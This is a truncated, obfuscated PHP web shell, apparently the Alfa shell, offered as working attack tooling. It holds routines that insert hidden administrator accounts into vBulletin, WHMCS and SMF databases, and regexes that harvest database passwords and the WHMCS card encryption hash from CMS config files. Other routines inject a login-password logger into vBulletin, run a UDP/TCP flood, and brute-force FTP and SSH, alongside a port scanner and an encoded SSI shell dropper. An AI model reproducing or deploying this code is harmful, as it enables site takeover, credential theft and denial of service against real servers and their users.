"inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto x69Db; m9Afv: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto S8ZmH; iCr9c: $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn)); goto OEe9C; yx5gq: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto br63y; S8ZmH: $localhost = $_POST["alfa2"]; goto r2DHL; br63y: $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','{$admin}','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','{$SQL}','" . date("Y-m-d") . "','" . time() . "')") or die(mysqli_error($conn)); goto iCr9c; ymvBX: $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','16744444')") or die(mysqli_error($conn)); goto SAp0y; r2DHL: $database = $_POST["alfa3"]; goto WMuzP; yJQt1: $password = $_POST["alfa6"]; goto vS2Qa; P0x8A: if ($sole == 1) { $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis["userid"]; } goto ymvBX; WMuzP: $username = $_POST["alfa5"]; goto yJQt1; SAp0y: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto Th22q; bjYEm: $SQL = $_POST["alfa9"]; goto yx5gq; vS2Qa: $prefix = $_POST["alfa7"]; goto pQXOw; OEe9C: $sole = mysqli_num_rows($solevisible); goto P0x8A; pQXOw: $admin = $_POST["alfa8"]; goto bjYEm; Th22q: } goto AGMoW; qV9cf: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto m9Afv; u646v: echo __pre() . "<center><center><div class="txtfont_header">| vBulletin |<div><p>" . getConfigHtml("vb") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,'vb',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">"; goto UZI8k; AGMoW: } goto AvKAd; nHzbN: if (isset($_POST["alfa6"]) && $_POST["alfa6"] == "whmcs") { goto j823d; fzemi: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto CkHVE; j823d: echo __pre() . "<center><div class="txtfont_header">| Whmcs |</div><p><p>" . getConfigHtml("whmcs") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,this.password.value,'whmcs',null,this.admin.value,this.email.value); return false;" method="POST">"; goto fzemi; CkHVE: create_table($table); goto o0Oqj; y9TUT: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto eggxk; eKWdd: $SQL = $_POST["alfa9"]; goto fOhpC; fOhpC: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto sdAkc; I7SgF: $admin = $_POST["alfa8"]; goto eKWdd; IgX_N: $database = $_POST["alfa3"]; goto Z4R_8; mfGSA: $password = $_POST["alfa5"]; goto I7SgF; sdAkc: $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn)); goto nunca; eggxk: $localhost = $_POST["alfa2"]; goto IgX_N; Z4R_8: $username = $_POST["alfa4"]; goto mfGSA; nunca: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto hZyCk; hZyCk: } goto lxlDU; o0Oqj: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto y9TUT; lxlDU: } goto GMWFM; HB3T9: if (isset($_POST["alfa10"]) && $_POST["alfa10"] == "smf") { goto zjMtq; LWEXG: create_table($table); goto uu2vI; uu2vI: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto CqvlQ; CqvlQ: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto KVFv3; cVnl2: $setpwAlg = sha1(strtolower($admin) . "solevisible"); goto p9zZ_; X8NFt: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto cVnl2; K9rUi: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto gNR7_; KVFv3: $localhost = $_POST["alfa2"]; goto SET6A; EteeP: $username = $_POST["alfa5"]; goto SFAJm; h6nlx: $prefix = $_POST["alfa7"]; goto YKcA4; p9zZ_: $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'{$admin}','1','{$admin}','{$setpwAlg}','[email protected]')") or die(mysqli_error($conn)); goto K9rUi; SET6A: $database = $_POST["alfa3"]; goto EteeP; YKcA4: $admin = $_POST["alfa8"]; goto X8NFt; SFAJm: $password = $_POST["alfa6"]; goto h6nlx; gNR7_: } goto fvCtZ; NNyEK: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => "smf_", "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "hi", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true)); goto LWEXG; zjMtq: echo __pre() . "<center><center><div class="txtfont_header">| SMF |</div><p><p>" . getConfigHtml("smf") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,'smf'); return false;" method="POST">"; goto NNyEK; fvCtZ: } goto aSe6C; km3Z2: } goto fQk2e; PTOoj: $default_charset = "Windows-1251"; goto PHDKT; oq_nl: $CyvIHOdCHU = "e" . "va" . "l" . ''; goto szIkW; i0AIl: function alfaGetConfig() { goto H4L5m; Q9dxZ: if (isset($prefix)) { if (preg_match($prefix, $file, $mach)) { $data["prefix"] = $mach[$cprefix]; } } goto Yp_MD; cmhva: $srch_name = $config[$cms]["dbname"][0]; goto qaCD8; aTvsb: $srch_user = $config[$cms]["dbuser"][0]; goto cmhva; wg3Ep: $path = trim($_POST["alfa2"]); goto sRvuS; Yp_MD: if ($cms == "whmcs") { if (preg_match($config[$cms]["cc_encryption_hash"][0], $file, $mach)) { $data["cc_encryption_hash"] = $mach[3]; } } goto fV5NP; eA5O7: $file = $config[$cms]["file"]; goto lUUUC; vACUV: $cpw = $config[$cms]["dbpw"][1]; goto EZTwV; qaCD8: $srch_pw = $config[$cms]["dbpw"][0]; goto gX1pl; Ty22b: $cname = $config[$cms]["dbname"][1]; goto vACUV; EZTwV: $cprefix = $config[$cms]["prefix"][1]; goto q6fPv; KGKqW: $srch_host = $config[$cms]["host"][0]; goto aTvsb; fV5NP: echo json_encode($data); goto r89R9; sRvuS: $config = array("wp" => array("file" => "/wp-config.php", "host" => array("/define\('DB_HOST',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "dbname" => array("/define\('DB_NAME',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "dbuser" => array("/define\('DB_USER',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "dbpw" => array("/define\('DB_PASSWORD',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "prefix" => array("/table_prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "drupal" => array("file" => "/config.php", "host" => array("/define\('DB_HOSTNAME',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "dbname" => array("/define\('DB_DATABASE',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "dbuser" => array("/define\('DB_USERNAME',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "dbpw" => array("/define\('DB_PASSWORD',(\s+)(?:'|")(.*?)(?:'|")\);/", 2), "prefix" => array("/define\('DB_PREFIX',(\s+)(?:'|")(.*?)(?:'|")\);/", 2)), "vb" => array("file" => "/includes/config.php", "host" => array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "phpnuke" => array("file" => "/config.php", "host" => array("/dbhost(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/dbname(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/dbuname(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/dbpass(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "smf" => array("file" => "/Settings.php", "host" => array("/db_server(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/db_name(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/db_user(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/db_passwd(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/db_prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "whmcs" => array("file" => "/configuration.php", "host" => array("/db_host(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/db_name(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/db_username(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/db_password(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "cc_encryption_hash" => array("/cc_encryption_hash(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "joomla" => array("file" => "/configuration.php", "host" => array("/\$host(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/\$db(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/\$user(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/\$password(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/\$dbprefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "phpbb" => array("file" => "/config.php", "host" => array("/dbhost(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/dbname(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/dbuser(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/dbpasswd(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/table_prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "mybb" => array("file" => "/inc/config.php", "host" => array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3))); goto GCHJC; VbTrK: if (preg_match($srch_user, $file, $mach)) { $data["user"] = $mach[$cuser]; } goto wN95u; gX1pl: $prefix = $config[$cms]["prefix"][0]; goto eA5O7; i0fZb: $cuser = $config[$cms]["dbuser"][1]; goto Ty22b; Olzts: $file = __read_file($file); goto v68WE; GCHJC: $data = array(); goto KGKqW; lUUUC: $chost = $config[$cms]["host"][1]; goto i0fZb; L52FJ: if (preg_match($srch_pw, $file, $mach)) { $data["password"] = $mach[$cpw]; } goto Q9dxZ; wN95u: if (preg_match($srch_name, $file, $mach)) { $data["dbname"] = $mach[$cname]; } goto L52FJ; H4L5m: $cms = $_POST["alfa1"]; goto wg3Ep; v68WE: if (preg_match($srch_host, $file, $mach)) { $data["host"] = $mach[$chost]; } goto VbTrK; q6fPv: if (@is_dir($path) || _alfa_is_dir($path)) { $file = $path . $file; } elseif (@is_file($path) || _alfa_is_dir($path, "-e")) { $file = $path; } else { return false; } goto Olzts; r89R9: } goto EURtO; dN901: if (!function_exists("posix_getgrgid") && strpos(@ini_get("disable_functions"), "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto kxiel; EURtO: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("alfa" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "FilesMan"; } } goto IQjN1; wKMv3: function alfaPerms($p) { goto lEElX; Euq6X: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : "-"); goto c0MSA; UVV_P: $i .= $p & 0x10 ? "w" : "-"; goto psdRl; NVASg: $i .= $p & 0x2 ? "w" : "-"; goto TjvZe; SoSfV: return $i; goto Wz6hh; qc1gT: $i .= $p & 0x4 ? "r" : "-"; goto NVASg; lEElX: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = "-"; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto QQQWe; c0MSA: $i .= $p & 0x20 ? "r" : "-"; goto UVV_P; eCu1D: $i .= $p & 0x80 ? "w" : "-"; goto Euq6X; TjvZe: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : "-"); goto SoSfV; psdRl: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : "-"); goto qc1gT; QQQWe: $i .= $p & 0x100 ? "r" : "-"; goto eCu1D; Wz6hh: } goto a8cEH; ib3Lc: function alfaselfrm() { if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "yes") { goto X4f6N; LJdNv: echo "</center>"; goto rRKHa; X4f6N: echo __pre() . "<center>"; goto saFm7; saFm7: if (@unlink($GLOBALS["__file_path"])) { echo "<b>Shell has been removed</i> :)</b>"; } else { echo "unlink error!"; } goto LJdNv; rRKHa: } if (isset($_POST["alfa1"]) && $_POST["alfa1"] != "yes") { goto nKM1W; bJIAt: echo "\xd\xa<center><p><img src="http://solevisible.com/images/farvahar-iran.png"></p>"; goto gSf5T; gSf5T: echo "<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g('selfrm',null,'yes');"> Yes</a>"; goto TKsul; TKsul: echo "</p></center></div>"; goto KRNjx; nKM1W: echo "<div class=header>"; goto bJIAt; KRNjx: } } goto BO7_9; lgB26: function alfassiShell() { goto p4eLi; tiv2e: @chmod("alfa_ssi.shtml", 0755); goto RcEft; bbip0: alfafooter(); goto NREPb; RcEft: echo AlfaiFrameCreator("alfa_shtml/alfa_ssi.shtml"); goto a5xsI; IjRoV: @mkdir("alfa_shtml", 0755); goto w7W3T; BVN26: $code = "rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw=="; goto VA7fK; w7W3T: @chdir("alfa_shtml"); goto NWNyN; a5xsI: echo "</div>"; goto bbip0; p4eLi: alfahead(); goto rMuQT; rMuQT: echo "<div class=header>"; goto IjRoV; NWNyN: alfacgihtaccess("shtml"); goto BVN26; VA7fK: @__write_file("alfa_ssi.shtml", __get_resource($code)); goto tiv2e; NREPb: } goto UpqQn; s1zW6: function hijackvBulletin($path, $saveto) { goto BxHuc; CYJcx: $dologin = "do_login_redirect();"; goto ek5Qn; rxL_S: $class = $path . "/includes/class_bootstrap.php"; goto CYJcx; G6C3i: $clearpw = "defined('DISABLE_PASSWORD_CLEARING')"; goto lUgJl; BxHuc: $code = "$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`='" . $alfa_username . "'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . ' : ' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}"; goto G6C3i; lUgJl: $code = str_replace("{saveto_path}", $saveto, $code); goto LCotE; C4eZ3: $evil_class = "true"; goto B9nLw; LCotE: $login = $path . "/login.php"; goto rxL_S; B9nLw: if (@is_file($login) and @is_writable($login) and @is_file($class) and @is_writable($class)) { goto U0cih; OzP5x: if (strstr($data_login, $dologin) and strstr($data_class, $clearpw)) { goto qibOl; iHDsG: $class_replace = str_replace($clearpw, $evil_class, $data_class); goto qBGK2; wfrHx: @file_put_contents($class, $class_replace); goto ajdTv; qibOl: $login_replace = str_replace($dologin, $evil_login, $data_login); goto iHDsG; qBGK2: @file_put_contents($login, $login_replace); goto wfrHx; ajdTv: hijackOutput(0, $saveto); goto NUEjk; NUEjk: } else { hijackOutput(1); } goto RLSzR; U0cih: $data_login = @file_get_contents($login); goto AFjvO; AFjvO: $data_class = @file_get_contents($class); goto OzP5x; RLSzR: } else { hijackOutput(1); } goto Wx36Z; ek5Qn: $evil_login = "	" . $code . "
	" . $dologin; goto C4eZ3; Wx36Z: } goto FRE53; KWEwD: function hijackOutput($c = 0, $p = '') { echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : "<center><font color="red">Error in inject code !</font></center>"; } goto lFYVU; SsuhU: function alfados() { goto dZN_V; nyzCr: alfafooter(); goto ISTo6; rPgQp: echo "<div class=header>"; goto eIN6h; Jic7M: echo "</div>"; goto nyzCr; dZN_V: alfahead(); goto rPgQp; g8G51: if (!empty($_POST["alfa1"]) && !empty($_POST["alfa2"]) && !empty($_POST["alfa3"])) { goto nv7aG; dkG8C: $max_time = $exec_time + $time; goto D_6Jl; Kfbos: $time = time(); goto dkG8C; D_6Jl: $host = $_POST["alfa1"]; goto c25cl; C86x2: echo "<center>{$packets} (" . @round($packets * 65 / 1024, 2) . " MB) packets averaging " . @round($packets / $exec_time, 2) . " packets per second</center>"; goto BPutK; BPutK: echo "</pre>"; goto VjtwC; JGuVx: $out = str_repeat("X", 65000); goto iE9jy; oD3hg: $method = $_POST["alfa4"]; goto JGuVx; MwOU6: $packets = 0; goto P35Ly; iE9jy: while (1) { $packets++; if (time() > $max_time) { break; } $fp = @fsockopen($method . "://" . $host, $port, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); } } goto C86x2; P35Ly: ignore_user_abort(true); goto br_Yl; nv7aG: echo __pre(); goto MwOU6; br_Yl: $exec_time = (int) $_POST["alfa2"]; goto Kfbos; c25cl: $port = (int) $_POST["alfa3"]; goto oD3hg; VjtwC: } goto Jic7M; eIN6h: echo "<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g('dos',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>"; goto g8G51; ISTo6: } goto bdXxs; wc9n7: function alfaportscanner() { goto YMSP3; YkTcV: $host = strip_tags($_POST["alfa4"]); goto Mqavg; G9Tm8: $end = strip_tags($_POST["alfa3"]); goto YkTcV; DlhWW: $start = strip_tags($_POST["alfa2"]); goto G9Tm8; YMSP3: alfahead(); goto sbn23; Mqavg: if (isset($_POST["alfa4"]) && is_numeric($_POST["alfa3"]) && is_numeric($_POST["alfa2"])) { goto LjzqZ; IE0kw: $packetContent = "GET / HTTP/1.1
\xa
"; goto dY2jr; dY2jr: if (ctype_xdigit($packetContent)) { $packetContent = @pack("H*", $packetContent); } else { $packetContent = str_replace(array("
", "
"), '', $packetContent); $packetContent = str_replace(array("\r", "\n"), array("\xd", "
"), $packetContent); } goto YCZ4X; YCZ4X: for ($i = $start; $i <= $end; $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3); if ($sock) { goto RDCfn; kO0xF: $maxtry = 1; goto CC32G; HM1nE: echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>"; goto zSQXf; rP_79: do { $line = fgets($sock, 1024); if (trim($line) == '') { $counter++; } $bin .= $line; } while ($counter < $maxtry); goto cl3VY; cl3VY: fclose($sock); goto g4O6w; RDCfn: stream_set_timeout($sock, 5); goto ECiHz; xmHYs: $counter = 0; goto kO0xF; ECiHz: fwrite($sock, $packetContent . "
\xa
\xa\0"); goto xmHYs; g4O6w: echo "<center><p>Port <font style='color:#DE3E3E'>{$i}</font> is open</p>"; goto HM1nE; CC32G: $bin = ''; goto rP_79; zSQXf: } flush(); } goto HsOXt; LjzqZ: echo __pre(); goto IE0kw; HsOXt: } goto QoHEU; QoHEU: echo "</div>"; goto b7Ser; b7Ser: alfafooter(); goto Rv9_T; sbn23: echo "<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>\xd
<form action="" method="post" onsubmit="g('portscanner',null,null,this.start.value,this.end.value,this.host.value); return false;">
\xa<input type="hidden" name="y" value="phptools">\xd\xa<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>\xd
<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>\xd\xa<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />\xd\xa</form></center><br>"; goto DlhWW; Rv9_T: } goto YuoxJ; Sr2OM: function __read_file($file, $boom = true) { goto QGzB0; Ve70W: return $content; goto DqQgN; WD5uj: if (empty($content) || !$content) { $content = alfaEx("cat '" . addslashes($file) . "'"); } goto Ve70W; bwA8Z: if ($fh = @fopen($file, "rb")) { $content = ''; while (!feof($fh)) { $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192); } } goto WD5uj; QGzB0: $content = false; goto bwA8Z; DqQgN: } goto K_RmO; ZHVU5: foreach ($_POST as $key => $value) { if (is_array($_POST[$key])) { $i = 0; foreach ($_POST[$key] as $f) { goto SNeop; SNeop: $f = trim(str_replace(" ", "+", $f)); goto XeEwn; d6KaR: $i++; goto gmt98; XeEwn: $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey()); goto d6KaR; gmt98: } } else { $value = trim(str_replace(" ", "+", $value)); $_POST[$key] = decrypt_post($value, _AlfaSecretKey()); } } goto FCCSU; FCCSU: $default_action = "FilesMan"; goto i_Ftg; kWOwO: date_default_timezone_set("Asia/Tehran"); goto cLCU3; rI1gc: function Alfa_FTPC($info) { if ($con = @ftp_connect($info["target"], $info["port"])) { if ($con) { $login = @ftp_login($con, $info["username"], $info["password"]); if ($login) { CrackerResualt($info); } } } @ftp_close($con); } goto ZDeKS; oberm: function alfassh2() { if (function_exists("ssh2_connect")) { goto v1KXG; mixVQ: $ssh_command = $_POST["alfa5"]; goto jKiqx; Uyjb6: if ($_SESSION["connected"] !== true) { goto TFzgB; atUMQ: echo "<form name='ssh2' method='post' onsubmit='g("ssh2",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color="#ffffff"><b>IP</b></font></td><td><font color="#ffffff"><b>SSH USER</b></font></td><td><font color="#ffffff"><b>SSH PASS</b></font></td><td><font color="#ffffff"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>"; goto Pcxup; TFzgB: alfahead(); goto Pnlev; Pcxup: alfafooter(); goto Ge8Rk; Pnlev: echo "<div class=header>"; goto atUMQ; Ge8Rk: } goto DTpOE; xJnqt: $ssh_pass = $_POST["alfa3"]; goto mWS5U; t3ux0: $ssh_ip = $_POST["alfa1"]; goto fcujx; mWS5U: $ssh_port = $_POST["alfa4"]; goto mixVQ; jKiqx: if ($alfaconnect2ssh = @ssh2_connect($ssh_ip, $ssh_port)) { if ($alfalogin = @ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) { $_SESSION["connected"] = true; } } goto Uyjb6; v1KXG: $_SESSION["connected"] = false; goto t3ux0; fcujx: $ssh_login = $_POST["alfa2"]; goto xJnqt; DTpOE: if ($_SESSION["connected"] == true) { goto DSpqf; X4ClQ: echo "<div class=header>"; goto Q2L4r; ijBIE: if ($_POST["alfa6"] == ">>") { goto xGihJ; pkAI5: ob_start(); goto AmyzO; AmyzO: echo stream_get_contents($output); goto kVDD9; kVDD9: echo htmlspecialchars(ob_get_clean()); goto bDHXZ; xGihJ: echo "<pre class=ml1>"; goto pkAI5; bDHXZ: } goto Ae82G; Q2L4r: echo "<form name='ssh2' method='post' onsubmit='g("ssh2",null,"" . $ssh_ip . "","" . 